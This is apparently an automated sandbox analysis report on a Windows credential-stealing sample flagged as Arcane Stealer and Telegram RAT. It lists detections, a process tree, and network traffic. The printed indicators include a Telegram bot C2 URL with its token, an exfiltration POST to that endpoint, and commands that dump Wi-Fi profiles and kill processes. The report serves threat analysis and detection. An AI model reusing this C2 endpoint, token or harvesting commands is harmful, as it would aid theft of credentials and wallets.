Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zyEDYRU0jw.exe

Overview

General Information

Sample name:zyEDYRU0jw.exe
renamed because original name is a hash value
Original sample name:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d.exe
Analysis ID:1576963
MD5:41d3660b5321768122f4c25ac9868fc3
SHA1:d42e3c5fc24e309581819cba723b14c3c247d824
SHA256:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

Arcane
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Arcane Stealer
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • zyEDYRU0jw.exe (PID: 1352 cmdline: "C:\Users\user\Desktop\zyEDYRU0jw.exe" MD5: 41D3660B5321768122F4C25AC9868FC3)
    • cmd.exe (PID: 2172 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6104 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 768 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 3356 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7232 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7280 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 7540 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7596 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • taskkill.exe (PID: 7640 cmdline: TaskKill /F /IM 1352 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 7692 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 7700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
ROLLCOAST, ArcaneROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
zyEDYRU0jw.exeJoeSecurity_ArcaneYara detected Arcane StealerJoe Security
    zyEDYRU0jw.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      zyEDYRU0jw.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ArcaneYara detected Arcane StealerJoe Security
          00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Process Memory Space: zyEDYRU0jw.exe PID: 1352JoeSecurity_ArcaneYara detected Arcane StealerJoe Security
                  Click to see the 2 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.zyEDYRU0jw.exe.650000.0.unpackJoeSecurity_ArcaneYara detected Arcane StealerJoe Security
                    0.0.zyEDYRU0jw.exe.650000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.0.zyEDYRU0jw.exe.650000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security

                        Sigma Signatures

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Capture Wi-Fi password
                        Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zyEDYRU0jw.exe", ParentImage: C:\Users\user\Desktop\zyEDYRU0jw.exe, ParentProcessId: 1352, ParentProcessName: zyEDYRU0jw.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 2172, ProcessName: cmd.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T19:47:12.021049+010020390091A Network Trojan was detected149.154.167.220443192.168.2.549708TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T19:47:11.098387+010028438561A Network Trojan was detected192.168.2.549708149.154.167.220443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: zyEDYRU0jw.exeAvira: detected
                        Found malware configuration
                        Source: zyEDYRU0jw.exe.1352.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}
                        Multi AV Scanner detection for submitted file
                        Source: zyEDYRU0jw.exeReversingLabs: Detection: 63%
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for sample
                        Source: zyEDYRU0jw.exeJoe Sandbox ML: detected
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                        Source: zyEDYRU0jw.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: System.Xml.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Windows.Forms.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: Stealer.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.pdbSystem.ni.dll source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb source: zyEDYRU0jw.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Net.Http.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Security.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.IO.Compression.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Configuration.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Xml.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: LOGLOA~1.PDBwinload_prod.pdb source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B1A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: acation Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA93)W source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B31000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Net.Http.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Drawing.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Drawing.pdb < source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.IO.Compression.pdbH source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.5:49708 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.5:49708
                        Uses the Telegram API (likely for C&C communication)
                        Source: unknownDNS query: name: api.telegram.org
                        Source: global trafficHTTP traffic detected: POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88"Host: api.telegram.orgContent-Length: 89443Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                        Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: icanhazip.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://mail.ru%https://rambler.ru-https://www.paypal.com#https://yandex.ru equals www.rambler.ru (Rambler)
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net'https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.epicgames.com;https://genshin.hoyoverse.com5https://us.shop.battle.net/https://www.booking.com/https://keep.google.com)https://www.ebay.com5https://steamcommunity.com3https://www.microsoft.com#https://yahoo.com'https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.com-https://www.icloud.com-https://www.reddit.com equals www.yahoo.com (Yahoo)
                        Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                        Source: global trafficDNS traffic detected: DNS query: 238.14.8.0.in-addr.arpa
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: unknownHTTP traffic detected: POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88"Host: api.telegram.orgContent-Length: 89443Expect: 100-continueConnection: Keep-Alive
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                        Source: zyEDYRU0jw.exeString found in binary or memory: http://icanhazip.com
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://accounts.google.com/oauth/multilogin
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://api.telegram.org/bot
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocumentT
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://gmail.com
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://ipinfo.io/#
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://ozon.ru
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://x.com-https://ads.google.com-https://pay.google.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                        E-Banking Fraud

                        barindex
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D3FC180_2_00D3FC18
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D355A70_2_00D355A7
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D355A80_2_00D355A8
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D06A680_2_06D06A68
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0E3380_2_06D0E338
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D01EF00_2_06D01EF0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D01EE00_2_06D01EE0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0DE770_2_06D0DE77
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0FC280_2_06D0FC28
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0FD700_2_06D0FD70
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0DB250_2_06D0DB25
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06E704300_2_06E70430
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002C46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002C46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2249779842.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002D92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002D92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002CEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002CEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2259776720.0000000006990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exeBinary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, ChromeDevToolsWrapper.csSuspicious URL: 'https://avito.ru', 'https://rambler.ru', 'https://yandex.ru'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/20@3/2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D03CAC CreateToolhelp32Snapshot,0_2_06D03CAC
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1352
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile created: C:\Users\user\AppData\Local\Temp\bwvswysc.wf3Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat
                        Source: zyEDYRU0jw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: zyEDYRU0jw.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1352)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, tmpB10E.tmp.dat.0.dr, tmpB0CB.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: zyEDYRU0jw.exeReversingLabs: Detection: 63%
                        Source: unknownProcess created: C:\Users\user\Desktop\zyEDYRU0jw.exe "C:\Users\user\Desktop\zyEDYRU0jw.exe"
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
